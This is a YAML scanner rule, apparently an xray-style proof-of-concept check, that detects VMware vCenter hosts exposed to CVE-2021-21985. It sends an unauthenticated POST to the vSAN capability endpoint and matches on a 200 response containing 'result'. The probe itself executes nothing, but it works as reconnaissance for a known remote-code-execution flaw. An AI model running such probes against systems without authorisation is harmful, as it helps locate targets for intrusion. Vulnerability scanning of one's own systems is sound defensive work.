name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
rules:
  - method: POST
    path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
    headers:
      Content-Type: application/json
    body: |-
      {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
    expression: |
      response.status == 200 && response.body.bcontains(b"result")
detail:
  vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
  author: envone77
  description: "vmware vCenter unauth RCE cve-2021-21985"
  links:
    - https://www.anquanke.com/post/id/243098
    - https://github.com/alt3kx/CVE-2021-21985_PoC